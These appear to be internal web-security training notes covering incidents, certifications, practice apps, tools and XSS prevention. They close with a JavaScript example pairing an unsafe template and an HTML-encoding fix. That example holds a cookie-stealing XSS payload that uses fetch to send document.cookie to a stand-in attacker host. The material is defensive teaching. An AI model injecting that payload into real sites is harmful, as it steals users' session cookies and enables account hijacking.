To understand the most common threats to web application security and what you can do to reduce the risk of your site being hacked.
- 2018-11-26 Malicious code found in npm package event-stream downloaded 8 million times in the past 2.5 months
- 2018-12-25 Ant Design Christmas Easter egg
- 2016-07-20 Wooyun.com was shut down
- Anyone who majored in Information Security at school?
- Anyone who has exploited an XSS vulnerability?
- Anyone who has installed Kali Linux?
- Anyone who has rooted an Android device or jailbroken an iOS device?
- Is there any chance you can recover your Windows login password if you forget it?
- Any experience dealing with security issues/incidents?
- Exploit XSS vulnerability to steal cookies
- Solution proposal for authorization check in anonymous applications
- Upload limitation in anonymous applications
- Sanitizing/Removing the `<script>` tag: https://sapjira.wdf.sap.corp/browse/KNGMHM02-11871
- Security vulnerability auditing reports by a third-party auditor
- Michael Solomon: CompTIA PenTest+
- Mike Chapple: CISM Cert, SSCP Cert, CompTIA CySA+, CISSP, CompTIA Security+
- Malcolm Shore: Penetration Testing
  - Overview of web security, including the WebSocket protocol
  - What a pentest is, basic bash scripting, Python, Kali ...
- Watch this course
- Use a password manager
- Stores passwords for different sites
- Fills in passwords on websites
- Store secure notes
- Generate strong passwords, etc.
- Secure all passwords with one master password
- LastPass, KeePass, 1Password, etc.
- Most can sync passwords between computers (browser extensions) and devices (android/ios app)
- OWASP(Open Web Application Security Project) Top 10
- XSS Prevention Checklist
- Excess XSS
- WebGoat
- WebGoat is a deliberately insecure web application (Java)
- https://github.com/WebGoat/WebGoat
- DVWA
- Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
- http://www.dvwa.co.uk/
- Nmap, Netcat, tcpdump, netstat ...
- Kali Linux
- Vega Scanner
- Burp Suite
- ZAP
- ...
- ISC^2 Certifications https://www.isc2.org/Certifications
- CompTIA Certifications https://certification.comptia.org/certifications?level=cybersecurity
- CompTIA CySA+
- CompTIA CASP+: Advanced Security Practitioner
- CompTIA PenTest+
- ISACA Certification http://www.isaca.org/Certification/Pages/default.aspx
- Cisco
- How does XSS work? Attacker-controlled script runs in the victim's browser under the site's origin; as a result, XSS can read document.cookie and hijack the session id
- DOM-based XSS: the payload is handled entirely by client-side JavaScript, no server involved
- Reflected/stored XSS: manipulated network request, client -> server -> client
- Sources: URL params / user input
- Solution
- Output encoding: emit untrusted data as a string (text), never as HTML or JavaScript code
- Input Validation
- Secure Libraries
  - Nearly all UI5 standard controls escape automatically; application developers do not have to care about output encoding when using these controls
  - Exceptions to the rule: no escaping is done for UI5 controls that allow embedding and rendering raw HTML, so application code must encode untrusted content itself before passing it in (e.g. with `sap/base/security/encodeXML`):
    - `sap.ui.richtexteditor.RichTextEditor`
    - `sap.ui.core.HTML`
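The cookie-stealing payload from the experience list above and the output-encoding fix from the solution list, as an added example that is not part of the original notes. It runs in Node without a browser: the attacker host is a placeholder, and `escapeHtml` is written here after OWASP XSS Prevention rule #1 (HTML-entity encoding); it is not a UI5 or project API.

```javascript
// Added example (not from the original notes): a reflected-XSS sink next to
// its output-encoded fix. The attacker domain is a placeholder.

// Constructed attacker payload: the classic cookie exfiltration vector.
// In a browser the onerror handler would send document.cookie to the attacker.
const PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable: untrusted input is pasted straight into an HTML template, so the
// browser parses it as markup, not as the user's name.
function renderGreetingUnsafe(name) {
  return `<h1>Hello ${name}</h1>`;
}

// OWASP XSS Prevention rule #1: encode the six characters that can change the
// HTML context before placing untrusted data into element content.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Hardened: same template, but the data is emitted as text, not as code.
function renderGreetingSafe(name) {
  return `<h1>Hello ${escapeHtml(name)}</h1>`;
}

// Crude detector used only to make the difference visible: does the rendered
// output still contain a tag other than the <h1> wrapper? Real code relies on
// the encoder at every sink, never on a detector like this.
function containsInjectedTag(html) {
  const inner = html.replace(/^<h1>/, '').replace(/<\/h1>$/, '');
  return /<[a-zA-Z]/.test(inner);
}

console.log('unsafe :', renderGreetingUnsafe(PAYLOAD));
console.log('safe   :', renderGreetingSafe(PAYLOAD));
console.log('injected tag survives? unsafe =',
  containsInjectedTag(renderGreetingUnsafe(PAYLOAD)),
  'safe =', containsInjectedTag(renderGreetingSafe(PAYLOAD)));
```

Encoding is context-specific: this function is correct only for HTML element content. Data placed into attributes, JavaScript, CSS or URLs needs the encoder for that context, which is why the slides point to the XSS Prevention Checklist and to secure libraries rather than hand-rolled escaping. Marking the session cookie HttpOnly is a separate defence that keeps document.cookie out of reach even when encoding is missed.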